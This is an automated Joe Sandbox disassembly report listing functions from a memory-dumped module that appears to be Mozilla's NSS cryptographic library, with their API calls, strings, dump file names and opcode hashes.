Instruction Fuzzy Hash: 6E3145B5A00501BBD701AF15EC41A46BB72FF4231CB188134E80922F61EB72F978DBCA

Function 6C52DC60 Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 282COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6C52DD56
memcpy.VCRUNTIME140(0000FFFE,?,?), ref: 6C52DD7C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C52DE67
memcpy.VCRUNTIME140(0000FFFC,?,?), ref: 6C52DEC4
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C52DECD

Strings

%s at line %d of [%.10s], xrefs: 6C52DF7C, 6C52DFEC
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C52DF6D, 6C52DFCC, 6C52DFDD
database corruption, xrefs: 6C52DF77, 6C52DFE7

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: memcpy$_byteswap_ulong
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 2339628231-598938438
Opcode ID: 9048a3f52895ae391beadfd7c263a81c600c0fbc8e220e27ff79da866e94fe75
Instruction ID: 2ea86b8b1759b3b9f894c645fe8a754082ffa934470198724a3ea73877160288
Opcode Fuzzy Hash: 9048a3f52895ae391beadfd7c263a81c600c0fbc8e220e27ff79da866e94fe75
Instruction Fuzzy Hash: 46A1F4716086019FC710CF29CC80A6AB7F5EF85308F19896DF8899BB81E738E855CB95

Function 6C5EEDD0 Relevance: 21.2, APIs: 14, Instructions: 239memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(?), ref: 6C5EEE0B

Part of subcall function 6C600BE0: malloc.MOZGLUE(6C5F8D2D,?,00000000,?), ref: 6C600BF8
Part of subcall function 6C600BE0: TlsGetValue.KERNEL32(6C5F8D2D,?,00000000,?), ref: 6C600C15

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C5EEEE1

Part of subcall function 6C5E1D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6C5E1D7E
Part of subcall function 6C5E1D50: EnterCriticalSection.KERNEL32(?), ref: 6C5E1D8E
Part of subcall function 6C5E1D50: PR_Unlock.NSS3(?), ref: 6C5E1DD3

TlsGetValue.KERNEL32 ref: 6C5EEE51
EnterCriticalSection.KERNEL32(?), ref: 6C5EEE65
PR_Unlock.NSS3(?), ref: 6C5EEEA2
free.MOZGLUE(?), ref: 6C5EEEBB
PR_SetError.NSS3(00000000,00000000), ref: 6C5EEED0
PR_Unlock.NSS3(?), ref: 6C5EEF48
free.MOZGLUE(?), ref: 6C5EEF68
PR_SetError.NSS3(00000000,00000000), ref: 6C5EEF7D
PK11_DoesMechanism.NSS3(?,?), ref: 6C5EEFA4
free.MOZGLUE(?), ref: 6C5EEFDA
PR_SetError.NSS3(FFFFE040,00000000), ref: 6C5EF055
free.MOZGLUE(?), ref: 6C5EF060

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
String ID:
API String ID: 2524771861-0
Opcode ID: a650c8c1f3e6797b472e8519c1022cf69c57c3ad9360b113df4dfb819c127b1f
Instruction ID: 01949073c58d90e47079d2935071f8fa77d6b81e1a9b733fa343372b33d3a9a0
Opcode Fuzzy Hash: a650c8c1f3e6797b472e8519c1022cf69c57c3ad9360b113df4dfb819c127b1f
Instruction Fuzzy Hash: AE8160B1A00209ABDF00DFA5EC85BDE7BB5BF4D318F144024E919A7711EB71E924CBA5

Function 6C5B4CF0 Relevance: 21.2, APIs: 14, Instructions: 237memoryCOMMON

Download Yara Rule

APIs

PK11_SignatureLen.NSS3(?), ref: 6C5B4D80
PORT_Alloc_Util.NSS3(00000000), ref: 6C5B4D95
PORT_NewArena_Util.NSS3(00000800), ref: 6C5B4DF2
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5B4E2C
PR_SetError.NSS3(FFFFE028,00000000), ref: 6C5B4E43
PORT_NewArena_Util.NSS3(00000800), ref: 6C5B4E58
SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6C5B4E85
DER_Encode_Util.NSS3(?,?,6C7005A4,00000000), ref: 6C5B4EA7
PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6C5B4F17
DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6C5B4F45
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C5B4F62
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C5B4F7A
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C5B4F89
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C5B4FC8

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
String ID:
API String ID: 2843999940-0
Opcode ID: ef6ec3550dcd923003fb9259a0ea4fec7d4d2a446825c43850a6bff8a014bf8c
Instruction ID: e11f59f827e550f82c5cec37c874f2c95d8564f60355b99c4127a5eb95bb29a8
Opcode Fuzzy Hash: ef6ec3550dcd923003fb9259a0ea4fec7d4d2a446825c43850a6bff8a014bf8c
Instruction Fuzzy Hash: 87818171A08301AFE721CF24DC90B5BBBE4AB85358F14892DF958EB741E771E905CB92

Function 6C5F5C10 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 221COMMON

Download Yara Rule

APIs

SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?), ref: 6C5F5C9B
PR_SetError.NSS3(FFFFE043,00000000,?,?,?,?,?), ref: 6C5F5CF4
SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?), ref: 6C5F5CFD
PR_smprintf.NSS3(tokens=[0x%x=<%s>],00000004,00000000,?,?,?,?,?,?), ref: 6C5F5D42
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?), ref: 6C5F5D4E
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5F5D78
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6C5F5E18
TlsGetValue.KERNEL32 ref: 6C5F5E5E
EnterCriticalSection.KERNEL32(?), ref: 6C5F5E72
PR_Unlock.NSS3(?), ref: 6C5F5E8B

Part of subcall function 6C5EF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C5EF854
Part of subcall function 6C5EF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C5EF868
Part of subcall function 6C5EF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C5EF882
Part of subcall function 6C5EF820: free.MOZGLUE(04C483FF,?,?), ref: 6C5EF889
Part of subcall function 6C5EF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C5EF8A4
Part of subcall function 6C5EF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C5EF8AB
Part of subcall function 6C5EF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C5EF8C9
Part of subcall function 6C5EF820: free.MOZGLUE(280F10EC,?,?), ref: 6C5EF8D0

Strings

d, xrefs: 6C5F5C36
tokens=[0x%x=<%s>], xrefs: 6C5F5D3D

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: free$CriticalSection$Delete$DestroyErrorModule$EnterR_smprintfUnlockValue
String ID: d$tokens=[0x%x=<%s>]
API String ID: 2028831712-1373489631
Opcode ID: 4d54a2b66dc96a0254dc32a2f5c12cd78fff7a6b7bf50729c4fc12e54ce05252
Instruction ID: d8026ebe83e53a54379469932ff11ea7ac0951e5e7beed43ade7ea5f5b7c0bcb
Opcode Fuzzy Hash: 4d54a2b66dc96a0254dc32a2f5c12cd78fff7a6b7bf50729c4fc12e54ce05252
Instruction Fuzzy Hash: 6E713AF0E051049BEB089F25DC4176F3275AF8130CF948435E92A9AB42EB32ED16CF92

Function 6C5E8F40 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(6C5E9582), ref: 6C5E8F5B

Part of subcall function 6C5FBE30: SECOID_FindOID_Util.NSS3(6C5B311B,00000000,?,6C5B311B,?), ref: 6C5FBE44

PORT_NewArena_Util.NSS3(00000800), ref: 6C5E8F6A

Part of subcall function 6C600FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5A87ED,00000800,6C59EF74,00000000), ref: 6C601000
Part of subcall function 6C600FF0: PR_NewLock.NSS3(?,00000800,6C59EF74,00000000), ref: 6C601016
Part of subcall function 6C600FF0: PL_InitArenaPool.NSS3(00000000,security,6C5A87ED,00000008,?,00000800,6C59EF74,00000000), ref: 6C60102B

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C5E8FC3
PK11_GetIVLength.NSS3(-00000001), ref: 6C5E8FE0
SEC_ASN1DecodeItem_Util.NSS3(?,?,6C6CD820,6C5E9576), ref: 6C5E8FF9
DER_GetInteger_Util.NSS3(?), ref: 6C5E901D
PORT_ZAlloc_Util.NSS3(?), ref: 6C5E903E
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C5E9062
memcpy.VCRUNTIME140(00000024,?,?), ref: 6C5E90A2
PORT_ZAlloc_Util.NSS3(?), ref: 6C5E90CA
memcpy.VCRUNTIME140(00000018,?,?), ref: 6C5E90F0
PR_SetError.NSS3(FFFFE006,00000000), ref: 6C5E912D
free.MOZGLUE(00000000), ref: 6C5E9136
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C5E9145

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Tag_$AlgorithmAlloc_Arena_Findmemcpy$ArenaDecodeErrorFreeInitInteger_Item_K11_LengthLockPoolcallocfree
String ID:
API String ID: 3626836424-0
Opcode ID: 754f00ff63165c97bb5a4a6b8a8130104a86fdaa75f3e401aa2c037ac9cd1b43
Instruction ID: 1f45d6be90da1c4f03730011095dbcfa0e6092770b837c0afc8ee991b6e7cc98
Opcode Fuzzy Hash: 754f00ff63165c97bb5a4a6b8a8130104a86fdaa75f3e401aa2c037ac9cd1b43
Instruction Fuzzy Hash: B651C1B2A042009BEB04CF28DC81B9AB7E9EF89318F054929E95597741E731E949CBD7

Function 6C5DADC0 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageSignInit), ref: 6C5DADE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C5DAE17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5DAE29

Part of subcall function 6C6BD930: PL_strncpyz.NSS3(?,?,?), ref: 6C6BD963

PR_LogPrint.NSS3(?,00000000), ref: 6C5DAE3F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C5DAE78
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5DAE8A
PR_LogPrint.NSS3(?,00000000), ref: 6C5DAEA0

Strings

hKey = 0x%x, xrefs: 6C5DAE62, 6C5DAE72
(CK_INVALID_HANDLE), xrefs: 6C5DAE1F, 6C5DAE80
hSession = 0x%x, xrefs: 6C5DAE01, 6C5DAE11
C_MessageSignInit, xrefs: 6C5DADE1
nkl, xrefs: 6C5DAEB8, 6C5DAEE6

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageSignInit$nkl
API String ID: 332880674-1267772660
Opcode ID: c32bcd86fcff60a5bb18ffbc1341158f384e18dc586250327a881b5e1f9c8b98
Instruction ID: 496c4900926e3415eda997cd5e3adbe270a95f71b5c8b112dbad2257e7ac0f10
Opcode Fuzzy Hash: c32bcd86fcff60a5bb18ffbc1341158f384e18dc586250327a881b5e1f9c8b98
Instruction Fuzzy Hash: EF31B5B2701255EBDB00DF18DC88BAB3775EB86319F454439E409AB612DF34A918CB9E

Function 6C5D9EE0 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageEncryptInit), ref: 6C5D9F06
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C5D9F37
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5D9F49

Part of subcall function 6C6BD930: PL_strncpyz.NSS3(?,?,?), ref: 6C6BD963

PR_LogPrint.NSS3(?,00000000), ref: 6C5D9F5F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C5D9F98
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5D9FAA
PR_LogPrint.NSS3(?,00000000), ref: 6C5D9FC0

Strings

hKey = 0x%x, xrefs: 6C5D9F82, 6C5D9F92
(CK_INVALID_HANDLE), xrefs: 6C5D9F3F, 6C5D9FA0
hSession = 0x%x, xrefs: 6C5D9F21, 6C5D9F31
C_MessageEncryptInit, xrefs: 6C5D9F01
nkl, xrefs: 6C5D9FD8, 6C5DA006

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageEncryptInit$nkl
API String ID: 332880674-1742630112
Opcode ID: 7a3eadf26f6650019790a52ccd8e3611a69ad701902025f08947c43a55e3a14c
Instruction ID: f525ac60c53411188f48dc4bc5e02622b5f0cefb98dcfd60fbf81b5c71d26a59
Opcode Fuzzy Hash: 7a3eadf26f6650019790a52ccd8e3611a69ad701902025f08947c43a55e3a14c
Instruction Fuzzy Hash: D531C6B2701345ABDB01DF18DC88BAE3775EB86359F054439E408ABA41DF34A858CB9F

Function 6C5D2DD0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitPIN), ref: 6C5D2DF6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C5D2E24
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5D2E33

Part of subcall function 6C6BD930: PL_strncpyz.NSS3(?,?,?), ref: 6C6BD963

PR_LogPrint.NSS3(?,00000000), ref: 6C5D2E49
PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C5D2E68
PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C5D2E81

Strings

pPin = 0x%p, xrefs: 6C5D2E63
ulPinLen = %d, xrefs: 6C5D2E7C
(CK_INVALID_HANDLE), xrefs: 6C5D2E2C
hSession = 0x%x, xrefs: 6C5D2E0E, 6C5D2E1E
nkl, xrefs: 6C5D2E99, 6C5D2EC4
C_InitPIN, xrefs: 6C5D2DF1

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPin = 0x%p$ ulPinLen = %d$ (CK_INVALID_HANDLE)$C_InitPIN$nkl
API String ID: 1003633598-3380830098
Opcode ID: 5740d4ea72793b1bf2006ef217eb71f7390967ca0a5068ac02a1d430143eb44b
Instruction ID: 5010487eba9863e21accf4795693420b087458083c8498b9a8f445668ee9d450
Opcode Fuzzy Hash: 5740d4ea72793b1bf2006ef217eb71f7390967ca0a5068ac02a1d430143eb44b
Instruction Fuzzy Hash: 7431D5B2701255EBDB009F18DD4CB5A3B75EB86319F454039E808A7B11DF30AD48CBAE

Function 6C5D7E00 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_VerifyUpdate), ref: 6C5D7E26
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C5D7E54
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5D7E63

Part of subcall function 6C6BD930: PL_strncpyz.NSS3(?,?,?), ref: 6C6BD963

PR_LogPrint.NSS3(?,00000000), ref: 6C5D7E79
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6C5D7E98
PR_LogPrint.NSS3( ulPartLen = %d,?), ref: 6C5D7EB1

Strings

(CK_INVALID_HANDLE), xrefs: 6C5D7E5C
hSession = 0x%x, xrefs: 6C5D7E3E, 6C5D7E4E
pPart = 0x%p, xrefs: 6C5D7E93
nkl, xrefs: 6C5D7EC9, 6C5D7EF7
ulPartLen = %d, xrefs: 6C5D7EAC
C_VerifyUpdate, xrefs: 6C5D7E21

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPart = 0x%p$ ulPartLen = %d$ (CK_INVALID_HANDLE)$C_VerifyUpdate$nkl
API String ID: 1003633598-2470974910
Opcode ID: 6f37e58dc50057744395a74ec0fecbd1639ea3463a67d000051f4bb78484a546
Instruction ID: 6697f0059d814829b68da6781241d14b7a147c282c7f5d21ffac1c8c80e73dc2
Opcode Fuzzy Hash: 6f37e58dc50057744395a74ec0fecbd1639ea3463a67d000051f4bb78484a546
Instruction Fuzzy Hash: 0331D7B5B01255EBD7009F68DD48B5B3BB1EB8235DF054038E808A7615DF30AD08CBAE

Function 6C5D6EF0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DigestUpdate), ref: 6C5D6F16
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C5D6F44
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5D6F53

Part of subcall function 6C6BD930: PL_strncpyz.NSS3(?,?,?), ref: 6C6BD963

PR_LogPrint.NSS3(?,00000000), ref: 6C5D6F69
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6C5D6F88
PR_LogPrint.NSS3( ulPartLen = %d,?), ref: 6C5D6FA1

Strings

(CK_INVALID_HANDLE), xrefs: 6C5D6F4C
hSession = 0x%x, xrefs: 6C5D6F2E, 6C5D6F3E
pPart = 0x%p, xrefs: 6C5D6F83
nkl, xrefs: 6C5D6FB9, 6C5D6FE7
C_DigestUpdate, xrefs: 6C5D6F11
ulPartLen = %d, xrefs: 6C5D6F9C

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPart = 0x%p$ ulPartLen = %d$ (CK_INVALID_HANDLE)$C_DigestUpdate$nkl
API String ID: 1003633598-1820698345
Opcode ID: 17a3fa946b926cd0d51a1faeb3d4011d4ea9ba32d6bd2d48770605fc422cd9e9
Instruction ID: 019ad02e34a502b3c162c7582d488fabd5fab0b4088575cc0c1faa29053682d6
Opcode Fuzzy Hash: 17a3fa946b926cd0d51a1faeb3d4011d4ea9ba32d6bd2d48770605fc422cd9e9
Instruction Fuzzy Hash: 7431C4B57012559FDB00DB28DD48B4A3BB1EB82359F054439E808A7612DF30E959CBDB

Function 6C5D7F30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_VerifyFinal), ref: 6C5D7F56
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C5D7F84
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5D7F93

Part of subcall function 6C6BD930: PL_strncpyz.NSS3(?,?,?), ref: 6C6BD963

PR_LogPrint.NSS3(?,00000000), ref: 6C5D7FA9
PR_LogPrint.NSS3( pSignature = 0x%p,?), ref: 6C5D7FC8
PR_LogPrint.NSS3( ulSignatureLen = %d,?), ref: 6C5D7FE1

Strings

(CK_INVALID_HANDLE), xrefs: 6C5D7F8C
hSession = 0x%x, xrefs: 6C5D7F6E, 6C5D7F7E
pSignature = 0x%p, xrefs: 6C5D7FC3
nkl, xrefs: 6C5D7FF9, 6C5D8027
ulSignatureLen = %d, xrefs: 6C5D7FDC
C_VerifyFinal, xrefs: 6C5D7F51

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pSignature = 0x%p$ ulSignatureLen = %d$ (CK_INVALID_HANDLE)$C_VerifyFinal$nkl
API String ID: 1003633598-3881341574
Opcode ID: cf7e38fd11c97cfb051d73e0c48a0d8c847d737baa02583ad0a570b23a6aba39
Instruction ID: fcf61cfb4ce7d58b6509dd60d4debe79f16c5fc86d08e87c598e26e1bf0c3071
Opcode Fuzzy Hash: cf7e38fd11c97cfb051d73e0c48a0d8c847d737baa02583ad0a570b23a6aba39
Instruction Fuzzy Hash: 2F31D5B1701255EFDB10DF18DD48F4A3BB1EB82359F454439E808A7611DF30A948CBAB

